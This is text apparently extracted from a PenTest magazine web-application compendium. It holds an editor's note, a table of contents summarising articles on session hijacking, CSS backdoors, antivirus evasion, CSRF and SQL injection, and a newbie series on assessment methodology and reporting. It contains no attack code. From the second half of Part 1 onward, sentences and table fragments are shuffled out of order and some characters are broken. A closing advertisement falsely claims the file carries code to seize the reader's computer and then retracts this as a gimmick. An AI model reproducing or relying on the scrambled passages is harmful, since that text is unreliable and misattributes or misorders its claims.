EDITOR'S NOTE

Hello Everyone!

It has been over a year since PenTest was released. A year full of great articles especially devoted to web applications. At the beginning PenTest had been released once per month and it was dedicated to a wide range of topics – including the realities of the market, interviews and social matters, particularly emphasising web applications. Web Application was created as an answer to your needs. Amazingly, it was first released in November and now it is the most popular and appreciated issue. But do not forget about Pentest Extra, Pentest Regular and Pentest Auditing & Standards, which also enjoy your interest and seek to be of the best quality and usefulness for you.

Therefore, we have decided to put them together and prepare for you something special. Now you can have them in one issue that you can obtain individually. So here it comes to summarize our fruitful cooperation: Pentest Web App Compendium: the only, the unique, the best! We proudly present Pentest Web App Compendium: 29 articles devoted to web applications carefully selected from all our issues to create a thematically diversified mixture of technically advanced pieces able to satisfy your expectations. Two hundred pages divided into several thematic categories: basics, overall, attack, XSS & CSRF, SQL injection, fuzzing and memory corruption.

Herman Stevens shows us plain hacker reality and all steps that the newbie has to take to become a hacker, as he mentions: „Let's face it: hackers like to take things apart to see how they work and find it challenging to find other, completely different uses other than their intended purpose".

We would like to say thank you to all our readers, partners, authors, betatesters and proofreaders. We wouldn't be here without your support and help. We greatly appreciate all suggestions and pieces of advice given to us in good faith. We always consider them and try to take advantage of your experience. We know that there are a lot more issues and problems to be discussed, since there is always something new to learn. But it is impossible to start all threads at the same time. So we like to think about this publication more as a good beginning rather than a big crowning. We believe it will encourage you to stay with PenTest for longer.

Enjoy reading!
Wojciech Chrapka, Malgorzata Skora & PenTest Team

01/2012(1) Page 4 http://pentestmag.com

CONTENTS

BASIC

10 Web Application Security for Newbies part 1
By Herman Stevens
Herman introduces us to the world of hacking and web application security. He shows us his own biography as a hacker and professional. What are his first conclusions, and what he recommends for newbies, you will know reading this brilliant article.

16 Web Application Security for Newbies part 2
By Herman Stevens
Herman Stevens continues his journey through Web Application Security showing newbies his personal experience. Once you have decided to go that path, life will never be boring again, you'll know it.

22 Web Application Security for Newbies part 3
By Herman Stevens
In the previous article you learned that all client-side security can be bypassed, because one does not need to use the provided client or even a browser to attack a website. Now we are going to build further on that knowledge and delve deeper into the fantastic world of application security.

OVERALL

26 Open Source Web Application Security Testing Tools
By Vinodh Velusamy
The author shows us the significance of Open Source Web Application Security Testing Tools. As he claims: „When you choose and use good tools, you'll minimize your time and effort installing them, running your tests, reporting your results – everything from start to finish. At the end of the day and over the long haul, this will add up to considerable business value you can't afford to overlook". With a good web vulnerability scanner you'll be able to maximize the number of legitimate vulnerabilities discovered to help reduce the risks associated with your information systems.

36 Web services and testing
By Saurabh Malhotra
A web service is just a system which resides somewhere on a network and gives responses to specific requests from clients. Here you must be aware of the term clients. Today, clients are not only the people working on their computers at the desk; it can also be some machines, etc.

44 Ready Your Firefox for Pentesting
By Dhananjay D. Garg
Although even today web browsers serve the primary purpose of bringing information resources to the user, they no longer represent a software application with bare bones support for just HTML. Most importantly, web browsers like Mozilla Firefox come with the support of add-ons, which are small installable enhancements to a browser's foundation.

50 Web Application Security Vulnerabilities Have Been Prevalent The Last Decade
By Matt Parsons
Port 80 and Port 443 have been a great attack vector for malicious attackers. This article will discuss the three most common and devastating software security vulnerabilities: SQL injection, Cross Site Scripting and Cross Site Request Forgery.

ATTACK

62 Session Hijacking
By Nikhil Srivastava
Session hijacking, also known as TCP session hijacking, allows a user to take control over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user's session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network.

72 Finding Your Target
By Willem Mouton
Dumpster diving, if you are up for it and have physical access to the target, means sifting through trash to get useful information, but in recent times social media can provide us with even more. Sites like LinkedIn, Facebook and Twitter can provide you with lists of […] projects that the organization is involved with and perhaps even information about third party products and suppliers that are in use.

76 Search Form Based DoS
By Bunyamin Demir
Many of today's applications have prevention against attack vectors like wildcard queries. But this still does not mean that they are not exposed to Denial of Service attacks. Simple search (space, etc., only one character) is not as effective as wildcard attacks. But even with simple search queries, the Advanced Search feature of the applications will create complex queries (containing more than one keyword, like bank account, credit) and as a result of these complex queries the number of results will be greatly increased, increasing the application server's response time if you find a good way to increase the amount of database results.

78 Backdoors Hiding Malicious Payloads Inside Cascading Style Sheets
By Hans-Michael Varbaek
When a website gets compromised a new file is often created by the attacker, so this could easily happen without the administrator's knowledge. On Linux the user used to help the attacker is www-data, which is by default used for serving Apache threads, where he or she can sometimes do almost the same on the system as any other user. So it wouldn't be smart to block that user from the system, as the Apache threads spawning from the main process (which is running as root in order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead.

82 How to pentest well-known CMS
By Sumedt Jitpukdebodin
Today, a new website is created about every minute. Anybody can be an owner of a website today very easily. Most new websites have the same look and page structure; the only difference is the logo of the website, different colors, customization of the theme. These entire websites are created with the same CMS. The CMS (Content Management System) is a web application system that has many tools for helping the web master to author content, administer the website, manage users, etc.

86 Bypassing web antiviruses
By Eugene Dokukin aka MustLive
After examining the web antiviruses Web Virus Detection System, McAfee SiteAdvisor, Google, Yahoo, Norton Safe Web, Yandex and StopBadware, he concluded that every web antivirus is vulnerable to malware's attempts to hide from it. This allows malware to go undetected and continue to infect visitors of these infected websites. In this article, he will describe such methods of bypassing web antiviruses and outline what developers of these systems need to take into consideration in order to prevent the possibility of hidden malware passing through them.

88 How to attack DNS
By Aleksandar Bratic
It is estimated that 20% of total Internet traffic is DNS traffic. DNS is very attractive to attack as very often IT administrators forget to implement measures to secure the DNS service. DNS listens on port 53, where UDP is used to resolve domain names to IP addresses and vice versa. It can also listen on TCP on the same port for zone transfers of full name record databases. A DNS flood works by sending a large number of rapid DNS requests, flooding the server with an amount of traffic that it can't handle so that the performance of the server drops for legitimate requests. As UDP is a connectionless protocol, a denial of service attack is very difficult to trace and block as they are highly spoofable.

XSS & CSRF

94 XSS Using Shell of the Future
By Sow Ching Shiong
Shell of the Future is a Reverse Web Shell handler. It has been designed to be used as a proof of concept to demonstrate the impact of an XSS vulnerability in a penetration test with the same ease as getting an alert box to pop up. It can be used to hijack sessions where JavaScript can be injected using XSS or through the browser's address bar. It makes use of HTML5's Cross Origin Requests and can bypass anti-session hijacking measures like Http-Only cookies and IP address-Session ID binding.

98 Cross-Site Request Forgery
By Jamie
During a test, I found a create user function which was vulnerable to CSRF. The payload would create a privileged account and email the password to the attacker. This would allow a targeted attack against the web site by sending the equivalent of phishing emails, except instead of trying to get the user to enter their credentials, they would simply have to click on a link while logged in.

104 XSS & CSRF: Practical exploitation of post-authentication vulnerabilities in web applications
By Marsel Nizamutdinov
The goal of this article is to demonstrate the real danger of post-authentication vulnerabilities. We will not explain the basics of web application attacks in this article, as that has already been done many times before by others. We will focus on a practical way to exploit post-authentication XSS and CSRF, which remain a highly underestimated attack vector in the security scene.

112 Discovering Modern CSRF Patch Failures
By Tyler Borland
Cross-site request forgery (CSRF/XSRF) vulnerabilities allow an attacker to perform authenticated actions without authenticating as the user. The issue revolves around general browser architecture and its handling of the web origin policy. In particular, issues stem from how it handles same origins and authority. Some of the issues can not be fixed in browsers as the real problem is how web applications handle actions.

120 Business Logic Vulnerabilities via CSRF
By Eugene Dokukin
There are two types of Business Logic flaws: server-side and client-side. The first one allows the user of the site to manipulate the site's functionality to increase his finances; the second one allows an external attacker to manipulate the site's functionality to increase his finances by decreasing the finances of the user of the site. And I have found both types of such vulnerabilities many times since 2005.

124 CSRF Attacks on Network Devices
By Eugene Dokukin
Network devices which have an option to allow remote access and have CSRF vulnerabilities can be attacked in such a way. The first attack is to turn on the remote access to the admin panel (it's off by default), to allow a remote attacker to access the admin panel from the Internet and change all required settings (and this attack can be conducted in one request).

SQL INJECTION

128 NTO SQL Invader
By Sow Ching Shiong
NTO SQL Invader is a SQL injection exploitation tool. It gives the ability to quickly and easily exploit or demonstrate SQL injection vulnerabilities in Web applications. With a few simple clicks, a penetration tester will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database.

132 SQL Injection Pen-Testing
By Sow Ching Shiong
SQL Injection is an attack in which the attacker manipulates input parameters which directly affect an SQL statement. This usually occurs when no input sanitisation is conducted. Depending on permissions, an attacker may be able to read database contents or even write to the database. In this article, the author will show you how to perform SQL injection pen-testing using open source and free tools available for Windows and Linux.

142 SQL Injection: Inject Your Way to Success
By Christopher Payne
Databases are the backbone of most commercial websites on the internet today. They store the data that is delivered to website visitors (including customers, employees, suppliers, and business partners). Backend databases contain lots of juicy information that an attacker may be interested in. These vulnerabilities are easy to locate and perform attacks against, whilst allowing an attacker to completely compromise an account and/or compromise the host. Here the author makes a great introduction into the art of SQL Injection.

FUZZING

150 Fuzzing for Free
By Mrityunjay Gautam
As a developer working on a product release, we tend to re-use most of the legacy code from the previous release and then work on the new features and bug-fixes only. As a QA resource, we would be using the same "conformance test suite" or the same "stress test suite" to ensure that the new builds are working as expected. In this article the author gives us a good insight into the theory of the art of fuzzing.

154 Fuzzing With Sulley
By Jose Selvi
Can you write a simple python script? Can you understand a network protocol and describe it using a simple object set? If so, you can find your own 0-day vulnerabilities! In this article we are going to describe how we can use the Sulley Fuzzing Framework with a real vulnerable FTP Server. Here, the author presents how to use the Sulley Tool.

158 Fuzzing With WebScarab
By Sagar Chandrashekar
WebScarab is a framework maintained by OWASP. It helps security engineers and developers to identify vulnerabilities and bugs in web applications. It is written in Java, thus portable to many platforms. WebScarab and WebGoat can be installed on both Linux and Windows machines. In order to follow along with the fuzzing exercises in this article, you will need a fuzzer and a fuzzing target. WebScarab will be our fuzzer and the WebGoat web application is our target. The author focuses on describing how the WebScarab Tool works.

164 Fuzzing in a Penetration Test
By Joshua Wright
Protocol fuzzing has been a popular technique for bug discovery, with a number of tools, books and papers describing the benefits and drawbacks. Although typically used for bug discovery in a lab environment, there are opportunities to use fuzzing in a penetration testing role too. As it is mentioned above, that fuzzing can be used in a wide range of ways, you will certainly get convinced by Josh.

MEMORY CORRUPTION

172 Introduction to exploit automation with Pmcma, Part I
By Jonathan Brossard
This year a tool called Pmcma (Post Memory Corruption Memory Analysis) was released at the Blackhat US security conference. The following article is an introduction to Pmcma. Determining exploitability is hard, and writing exploits is hard. In fact, they are two sides of the same coin. Proving unexploitability is provably unfeasible in the general case, due to theoretical limitations hopefully known to the reader of this paper (aka: halting problem), and practically for the vast majority of computer programs actually used nowadays. So what you can get at best is a "it's not doable given the state of the art of exploitation, public knowledge, common sense…". In this article the author made serious efforts to provide you all the details concerning the Pmcma tool.

184 Introduction to exploit automation with Pmcma, Part II
By Jonathan Brossard
The second part of the article describes pmcma, released at the Black Hat US conference this year, focusing on attacking function pointers, simulating arbitrary reads, detecting unaligned memory accesses and finally automating analysis and exploitation scenarios. The author made serious efforts to provide you all the details concerning this tool.

TEAM
Betatesters: A. Rao, Dennis Distler, Jonathan Ringler, Daniel Wood, Scott Christie, Johan Snyman, Massimo Buso, Kyle Kennedy, Eugene Dokukin, Jeff Weaver, Ed Werzyn, Robert Keeler, Rishi Narang, Ankit Prateek, Aidan Carty
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic
Editor: Wojciech Chrapka, Malgorzata Skóra
Art Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca
Marketing Director: Ewa Dudzic
Publisher: Software Press Sp. z o.o. SK, ul. Bokserska 1, 02-682 Warszawa
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. (ISC)2 & CISSP are service marks of the IISSCC, Inc. Security+ is a trade mark of CompTIA. ITIL is a trade mark of OGC. GSLC & GCIH are trademarks of GIAC.
To create graphs and diagrams we used program by
Mathematical formulas created by Design Science MathType™.

DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
BASIC

Web Application Security for Newbies – Part 1

Born this way
"How did you become a hacker?" is the number one question people ask me when they learn what I do for a living. This question does not have a short, or easy, answer. I believe that people are not made into hackers, but they are born that way. Let's face it: hackers like to take things apart to see how they work and find it challenging to find other, completely different uses other than their intended purpose. They like to break things, open them up, put them back together and learn as much as possible in the process.

I started my hacking life more than 40 years ago, by taking apart tube radios, modifying them to listen to distant stations on the short wave bands. In the process I re-utilized our clothesline and made it into a large radio antenna, to my mother's dismay. This tinkering activity was soon followed by my first introduction into programming. The personal computer had not been invented yet (yes, I am that old), but Hewlett Packard and Texas Instruments introduced some fantastic programmable calculators. Schools and universities were very quick to forbid their use because they wanted students to learn how to do the math rather than just punch a few buttons on a calculator to get an answer. Of course, like all forbidden fruits, this only made them even more popular. I have very fond memories of wasting whole evenings by typing hundreds of op-codes into a TI-58, to create a completely useless program that would calculate PI to an infinite number of digits.

A few years later, the wars between the ZX Spectrum and Commodore 64 computers, and later the Atari ST and the Amiga, began. That started my rudimentary programming skills in Basic, on the rubbery keyboard of the ZX Spectrum, which cascaded into a whole bunch of other programming languages on the Amiga (ARexx, Modula2, Forth, Pascal, Lattice C). The Internet was still only available in the deeper dungeons of the academic world, but people started to use modems to connect their computers to amateur networks, such as Fido, or commercial offerings like CompuServe. So, I became a node in the worldwide Fidonet, where people from all over the world connected to my Amiga 500 BBS (Bulletin Board System) to exchange email, news and files. After the demise of Commodore, I switched to a PC and ran the BBS on Linux (the infamous Slackware distribution that took about 20 floppies to load – usually one experienced a read error on the 20th disk). Fast forward a few years, to the birth of the commercial Internet. My humble Amiga 500 was the first non-academic and non-corporate system on the Internet in Belgium. My first act on the Internet – at least one that can still be traced in Google groups – was to start a flame war between Modula2 and C language fans. I am afraid that most young people nowadays do not really understand how long all their Internet comments will be available for everyone to see. I finally made my hobby into my profession (first as developer, then as security consultant) and the rest is history.

If you believe that you have the right attitude and these qualities, you might have the hackers' mentality, since they love new technologies and are very good at thinking out of the box. You have stumbled to the right place and read the right magazine, because this is exactly what this series is about: How to hack a web application (when talking to your friends), or How to assess the security of a critical web application (when talking to your customers). This series will provide you with knowledge on application security assessments: the tools, skills, background, and the knowledge that is needed to become a top consultant. This series will, apart from technical items, not only give a good introduction on the technical side, but will also work on the people, reporting and presentation skills. Don't worry, this will not become a boring theoretical series – there will be plenty of technical information as well.

This series starts from the assumption that you have the right mind set and are determined to learn as much about application security as there is to learn. With that attitude, anything goes and you will succeed. I also assume that you already have some basic networking and server knowledge and that you know some scripting and are not afraid to install applications and test tools, but might still not know that much about web applications, and even less about how to hack them.

Knowledge is King
When you start working as a consultant, you soon learn that your customers do not pay you for what you know about a specific subject, but for what you know about what works and what doesn't work. It is fine to know the technical faults, but the real value is in how you translate that knowledge into something your customers will value. Let me explain that further. Of course, working as a professional (as a pentester or hacker) your technical skills are important, but you should always keep in mind what the customer really wants. If you focus only on the technical part, you will be able to tell the customer about the vulnerabilities in their application, but not provide any advice on how to fix them; and if a fix would cost a million dollars and six months of additional testing, you need to have better advice to give to the customer other than: Fix this now! Your customer wants to know:
• What is the business risk?
• Is there a quick-fix available?
• Are there any mitigating measures?
• What can I do to prevent this from happening again?
• How much will it cost and what is the timing?
I have seen too many technical pen-test reports in the past, hammering hard on what was technically wrong with an application, or how you hacked your way into their network, but you will be more valuable to them if you can tell them how to prevent it next time, or what went wrong at the management level. Your report and information are the only things that are important: that is what the customer is paying for.

Your Customer Does not Really Know What They Want
Unfortunately, the problem is, what your customer asks you to do, or needs you to do, might not be what they really want you to do. Your report should respond to what the customer wanted you to execute. Unfortunately, in this big application security space, there is no generally accepted definition of what a pen-test is, or what a vulnerability assessment is, and there is even more confusion on what constitutes a proper assessment or pen-test. Leaving out source code review, there are two main types of possible assessments:
• a pen-test: the goal is to exploit a vulnerability (or multiple vulnerabilities) and gain access to an application or data (the target).
• a vulnerability assessment: the goal is to list as many vulnerabilities as possible, and provide an educated estimate of the vulnerability level, i.e. whether this is considered a high, medium or low risk.
(Note: The above definitions are mine; no further definitions are given.)
This series will focus on vulnerability assessments at the application level. I will offer plenty of interesting material on how to improve your skills.

Many of my customers will ask for a pen-test, but if you ask them about it, what they really want is a vulnerability assessment. Although, for a pen-test you must first find a vulnerability. A standard, such as the Payment Card Industry (PCI) standard, requires pen-testing (at network and application level) and vulnerability assessments. Talk to your customer, and give them the best choice based on their security objectives. If you need some arguments about what is the best type of assessment, try not to hit them with a bunch of marketing material, but give them independent and unbiased advice (customers have a long memory and will appreciate that) and refer your customer to this publication. One Technique is Not Enough: A comparison of Vulnerability Discovery Techniques (available from http://andrew-austin.com/papers/esem2011.pdf – note that their penetration test is in reality a vulnerability assessment) comes to the following conclusions:
• no single technique discovered every type of vulnerability.
• static analysis found the most implementation bugs.
• systematic manual penetration testing found the most design flaws.
• the most effective technique (measured in vulnerabilities discovered per hour) was automated penetration testing.
• if one has limited time.

Your Competitors will Muddy the Waters
You have talked to your customer about their needs, or read their detailed Request for Proposal and wrote a brilliant quote that answered all of their requirements. Unfortunately, the customer explained that your quote was twice the price of the cheapest one. Impossible! you think. Surely, you have the best experience, the best consultants and the best methodology. What went wrong? Unfortunately, there are many ways to execute a vulnerability assessment and your competitors were able to offer a lower price, because they have a different methodology:
• A fully automated scan, with nothing more than the automated report, takes less than a day and my little sister can execute it.
• An automated scan, with a consultant deleting the false positives, and a junior can do it.
• A largely manual assessment based on the deep knowledge of the consultant will take many days and needs a senior consultant.
Guess what methodology is the cheapest and was offered by your competitors? Note that all methodologies might have their benefits and be the best offer for the customer in certain circumstances, but even as a dedicated pentester, you definitely do not want to lose a project because one of your competitors offered the easy solution. Of course, if the customer needs a specific kind of assessment because of compliance requirements, they really do not have a choice. What to do? Make it very clear to your customer what you propose and what the advantages are:
• Use the descriptions and tests as defined in the OWASP ASVS (Application Security Verification Standard – https://www.owasp.org). The ASVS defines four levels of application-level security verification for Web applications. Each level described in ASVS includes a set of requirements for verifying the effectiveness of security controls that protect Web applications. The lowest level is the tool-based level. Some requirements just cannot be assessed by a tool.
• Use a standard methodology based on the OWASP Testing Guide: this is a very detailed guide, explaining step-by-step what needs to be tested in a typical web application vulnerability assessment. The guide (updated in 2008) is already a bit outdated, but remains a very solid basis for anyone starting in application security. You might want to start reading this guide, since in the next part of the series we will use it as a background.

What is This Thing called OWASP and Why Should I Care?
OWASP (the Open Web Application Security Project) is a not-for-profit, worldwide charitable organization focused on improving the security of application software. Its mission is to make application security visible, so that people and organizations can make informed decisions about true application security risks. Everyone is free to participate and all materials are available under a free and open software license. OWASP publishes many tools and guides related to application security. OWASP has local chapters with meetings all over the world. OWASP gained a lot of credibility when the Payment Card Industry (PCI) Data Security Standard (DSS) required that all applications in scope:
Asking for a reason.BASIC • Based on a case study of two web-based electronic health care record systems the paper. only to find out that they awarded the project to one of your competitors. takes less than a day. one should conduct automated penetration testing to discover implementation bugs and systematic manual penetration testing to discover design flaws. you will win this project! A few weeks you anxiously call the customer for news. However.org). Example priority rating for detected issues Priority Rating Critical Issues leading to an attacker gaining administrative rights on the application or gaining access to other parts of the back-end infrastructure Issues enabling an authentication or authorization bypass a denial-of-service (DOS) attack or a compliance issue. Usually they are not. Do not use an overly complex classification. This is very often used by companies to give the impression that their measurements are very exact and are based on solid research. This is closely related to a risk rating (I prefer to give it the name of priority rating. If you have invented your own completely different methodology. do not lose too much time performing tests to proof that they are vulnerable. Refer to Table 1. you will lose an awful lot of time explaining the benefits of your approach to your potential customers. but could accept a downtime of multiple days if confidentiality was in danger. Issues with a high priority rating should be tackled first. and you definitely do not want to be involved in discussions like. Must protect against the OWASP top-10 of vulnerabilities or similar. • Can the current employer detect if the one of his staff members is posting a resume? • Can employers see what type of profiles the competitors are looking for. A technical section providing an overview of all issues. 
Federal Trade Commission strongly recommends that all companies use the OWASP Top Ten and ensure that their partners do the same.• • Must comply with the secure coding guidelines of OWASP. Anything else detected that should be in the report. So.S. or can we wait six months. It is always easier to link your methodology to an established standard such as OWASP. In this case. where candidates could leave their resume. An example: • A multinational company offered an on-line job database. test for confidentiality issues.1 rated issue? The report should also include: • A management summary detailing the business risks and recommendations and it should not contain any technical details and jargon. High Medium Low Informational 01/2012 Page 13 http://pentestmag. and employers could search for good candidates.com . why is it in this first article of this series? Quite simple: the report is the one thing that your customers is paying you for. or what candidates they are approaching? • Can confidential data be extracted by thirdparties who should not have access to it? A company responsible for air traffic control has extremely high availability demands. Do we need to implement the fix immediately. It is based on the expectations by the customer of the project and should not be taken lightly. If the customer does not care about a specific security related risk.S. but could not care if data was leaked to the outside world (the information is mainly public). The U.4. but should explain exactly what harm an adversary can do. This issue is rated 63. but is not a security issue. for an example. such as: Ask the question: What keeps you awake at night ? This is the number one item your tests should be investigating and focusing on. • The Report A report is written at the end of an assignment. • Table 1. as with this 60. 
Defense Information Systems Agency has listed the OWASP Top Ten as key best practices that should be used as part of the Department of Defense Information Technology Security Certification and Accreditation Process. They really wanted to have a high level of confidentiality. the U. classified according to the priority rating. generally deviations of best practices without immediate impact. Everything you will validate during the security tests will be done because it is needed in the final report. Con�dentiality related issues or issues that weaken the security posture of the application Issues with very low impact. Note that this table must be modified for each assignment. since the term risk rating might have a different meaning depending on the type of the company or the risk-appetite of that same company). In addition. sg). information security consultant. 01/2012 HERMAN STEVENS After a career of 15 years spanning many roles (developer. where he is the director of his company Astyran Pte Ltd (http://www.org) in order to have a common language to discuss each item. provide details on countermeasures. security. Page 14 http://pentestmag.astyran. Recommended process improvement to prevent the issue from happening again for audit.astyran. Be very clear in what you offer. Read all about it next time! u Conclusion This was the first in our series. development and IT management detailed overview of scope and goal description of scoring method overview of tests executed detailed overview of each discovered issue Technical Section Be critical.org).steve ns@gmail. a proof of concept and the remediation steps. described without any technical jargon recommended countermeasures: quick �xes.BASIC Table 2. For the management section. the Common Attack Pattern Enumeration and Classification (CAPEC – http:// capec. new application. Know the contents of a quality report. temporary �x. next time we start with a technical overview of the HTTP protocol and the HTML standard. 
Make certain that you can do more than just pushing a button to start a tool. I hoped you like this article. Understand the goals of your customer and give him some unbiased advice. some often used tools and the first vulnerabilities for our report. and – where necessary – provide references to OWASP material (http://www. • • Know a bit or two about the OWASP Testing Guide and the OWASP ASVS standard.com). Contact Herman by email (herman. complex change.com) or visit his blog (http://blog. A temporary and mitigating measure might be to monitor the application to see if any brute-force efforts are happening or not. but remember: this is not only the fix at the application level. this might take a long time to fix. Payment Card Industry auditor. Astyran specializes in application security. In Information Technology. For each discovered item.com . everything becomes a commodity. Advise your customer on business risks and countermeasures. Typical content of a report Web Application Vulnerability Report Management Summary high level description of the scope and goal overview of critical and high priority rated items. but be correct: People’s jobs may be at risk because what you write. application security consultant) Herman Stevens. but maybe mitigating issues. The above recommendations should enable you to produce better reports than a report from a tool. Do not become the next one. awareness training and security in the SDLC.mitre. and focus on things that are interesting (and thus worth money) for your customer. such as penetration tests. secure code reviews. Table 2.org/) and the Common Weakness Enumeration (CWE – http://cwe. Keep your text short and to the point. An example: If the application has a weakness in the authentication system that allows an attacker to perform a brute-forcing attack. security product trainer. vulnerability assessments.mitre. include the following information: the description.owasp. Include an estimate (high. medium. the possible impact. 
low) of the costs and a recommended timing. you should: • • • • Know the difference between a penetration test and a vulnerability assessment. After reading this article. provides an overview of items usually present in a management summary or a technical section of a vulnerability assessment report. now works and lives in Singapore. . http://pentestmag. but in the real world. I still consider every assignment as fun. You must be capable to suck in that knowledge like a sponge. While I believe I do live an exciting life (after all. nerds and wizards at the keyboard. IT auditors and security managers. living an exciting life.. Remember. soon your 01/2012 • • • colleagues will learn from you also and respect you as a team member. As a future hacker. so they understand the good and the bad things about the solution.com Page 16 . not all of the above hacker capabilities are being sought after and in reality the image of the lone hacker is as far from the truth as can be imagined. exciting and even exhilarating at times. but in the end. you: Will be working in teams: No single individual possesses all the knowledge required. It really opens your mind to see what vulnerabilities others can find. Learn when to suppress your nerdy nature: Of course you must hone your technical skills. my skills has brought me to all corners of this planet). Will respect you colleagues and learn from them: I learned the most about application security by doing peer reviews of their reports. they love to tinker and delve deep into the technical details. no five-day ethical hacking course will make a skilled consultant out of you. how they describe the risks involved and potential ways to exploit those vulnerabilities. M • ovies usually paint the same image of hackers: self-trained loners..BASIC Web Application Security for Newbies – Part 2 The naked hacker None of the movies about hacking depict the real truth about it. Most hackers I know really are self-trained. But. 
and if you are really good. non-technical terms to top management. Only experience will teach you when you can cut corners safely. you will have limited time for a project. you are working for a customer. that has a specific goal or objective in mind. they are good at one thing – they attract people with potential talent into the ‘hacking’ profession. They hired you as professional to verify whether or not their new baby is secure (and this really means secure enough in the eyes of a businessman) and can attain the security objectives in line with the expectations of management. Follow a strict methodology: You definitely do not want to present an ‘all clear’ picture to management. no respect for rules and authority. capable of thinking out-of-the-box. or are even capable of attaining all that knowledge. you must be able to explain them in clear. and asking a colleague is usually way faster then delving into obscure manuals. while a staff member who ran a simple public domain tool just found a critical vulnerability. but part of the job is very boring. You need to develop or – when you start your life as a hacker – follow a strict methodology in order not to miss something important. com Page 22 . such as: • Does the application accept file-uploads? • Is there an email (e. A new version of the guide is alas long overdue. Let’s take a look at how the information gathering phase can be executed. They might have the same business functionality. frameworks and technologies used vulnerable to known attacks? What is the attack surface of the application? There are different definitions available of the attack surface. the principles of secure programming.php/Category:OWASP_Testing_Project). You will want to have the answers to the following questions: • What technology is used by the web application and. You just have to apply those principles to the new technology. leave feedback) option? • What input forms are available? Who are the users of the site? 
Information can be important to abuse later to brute-force the authentication system. Contrary to network level security. Once you have decided to go that path. and. Last month you learned that all client-side security can be bypassed. since there is always something new to learn. The secret is that once you know the basics. because one does not need to use the provided client or even a browser to attack a website. good for us. never forget the server-side part! We also touched up the need for a strict methodology.BASIC Web Application Security for Newbies – Part 3 I know what you developed last summer In the previous article you learned that all client-side security can be bypassed. but the design and implementation always differ wildly. because one does not need to use the provided client or even a browser to attack a website. are the versions of these services. life will never be boring again. whenever new things arrive (for instance mobile apps) the same old mistakes will be made by the new batch of eager developers wanting to jump on the new bandwagon. 01/2012 Information Gathering A good start to build your own methodology is to read the OWASP Testing Guide (https://www. Now we are going to build further on that knowledge and delve deeper in the fantastic world of application security. Information gathering is important. Customers often want to know how we can possible keep up with the changing technology landscape or the thousands of different frameworks. but in general these all vectors that can be used for an attack. Once you have decided to go that path. • • The OWASP Testing Guide lists the following activities in the Information Gathering Phase: http://pentestmag.org/ index.g. This is also true when you need to review an Android or iPhone app. No two applications are the same. it becomes easy. which makes application security pentesting both fun and challenging. life will never be boring again. since there is always something new to learn. 
applications are never the same. and this is where we start today. but the basics are still correct. T oday we are going to build further on that knowledge and delve deeper in the fantastic world of application security.owasp. It is the right time to protect your website with website security audit and with thorough website security test.com Page 26 . Introduction One of the prominent Information Security consultant and researcher. In fact. all billions of dollars are at risk. Quite ideally therefore cost effective security measures needs to be taken. It goes without saying. A web security testing service will in fact make sure that the company is fully compliant with rules and regulations. The assessment criterion of detecting the accuracy of SQL Injection is one of the most famous exposures and the most commonly implemented attack vector in web application scanners. I n fact more than four out of every five businesses have experienced a data breach still not all business website owners are aware of website security threats or how vulnerable their website is without the necessary protection. This research is only valid for estimating the detection accuracy of SQLi & RXSS exposures. This because a scanner that http://pentestmag. credit card information.html using the project WAVSEP. Shay Chen did not evaluate every possible feature of each product. 01/2012 There are some powerful and free web application security testing tools which can help you to identify any possible holes. This evaluation platform contains a collection of unique vulnerable web pages that can be used to test the various properties of web application scanners. impact of an attack on websites can actually cause costly and embarrassing disruptions in a company’s services. In this article we will explore the choice of tools available. 
Shay Chen’s Project WAVSEP consists of an evaluation platform which aids in the comparison of 60 Commercial & Open Source Black Box Web Application Vulnerability Scanners. their attempts to get at it are thoroughly assisted by several important factors. And this is where free web application security testing tools comes in. And without employing the web security testing tools business can incur loss. Attackers are lurking everywhere and they are well aware in fact aware of the Web application vulnerabilities. Shay Chen has conducted some extensive testing using these tools and has published a benchmarking report in http://sectooladdict. and for counting and comparing the various features of the tested tools. only the categories tested within the research.OVERALL Open Source Web Application Security Testing Tools Needless to say that with cybercrime is on the rise and with the immense rise in online security threats no business owner should overlook their website’s security and this is exactly where the concept of web application security testing tools have gained immense significance. which might entail moving away from proprietary client/server applications to web applications which are not only cheap but at the same time provides an extensive delivery platform. websites are vulnerable to online security threat and if a website’s server and applications are not protected from security vulnerabilities. Also.c om/2011/08/commercial-web-application-scanner. identities. and is able to respond quickly to any attacks.blogspot. �������������� ������������������ �������������������� ������������� ������������ ��������� ������������ ������� � � � � � � � � � �� ����������������� ���� ������������������������������������ ������ ����������������� �������� ��������� ���������������������� ��������������������� � ���������������� �� ��������������������� ����������������������������� ������������ . com securityservices @ p2sol dot com .393.Security Services : $50. 
TX 77803 pressing a button! Don’t be fooled by cheap competitor’s products! Tel 939. then masquerading as you.p2sol. so let’s change the rules and let the truth in our advertisement speak for our work. but that is today’s new paradigm. and IT departments: • • • • Penetration Testing Security Assessments Disaster Recovery Special Projects Hacked because someone used password123 as a “temporary” password……. Interested. We could tell you that we offer superior information security services followed by a highly biased list of reasons. the soft copy version of this document contains custom embedded software control codes designed to gain control over your computer. but the point is that skillful social manipulation in conjunction with “embedded software control codes” are the methods used by malicious parties to compromise (gain control of) modern networks. quotes of industry sources. Apologies for the above marketing gimmick.000 $50. For the same reasons that clever marketing can sell an inferior product. Sleep better with our D3tangler™ technology! Our new patent pending D3tangler technology helps you win the evolving Contact: game of IT security. manipulate stock prices using information contained on your system. However.trojacek@p2sol. and maybe you’ll give us the opportunity to let our work speak instead.com 120 N. Periodic reporting of key metrics.000 $400. MAIN BRYAN. your entire network can be hacked. security know how. The technology solves all your security problems by Shohn Trojacek . audit.000 Intrusion Detection System Redundant Firewalls Salaries for IT Security Personnel Gee Whiz Computer Defense Shield A UDI T S U P P O R T Strategic and Technical assessments for audit firms. but it was necessary to grab your attention. experience. Buy buy! Sell Sell!. Sound farfetched? Maybe 5 years ago. 
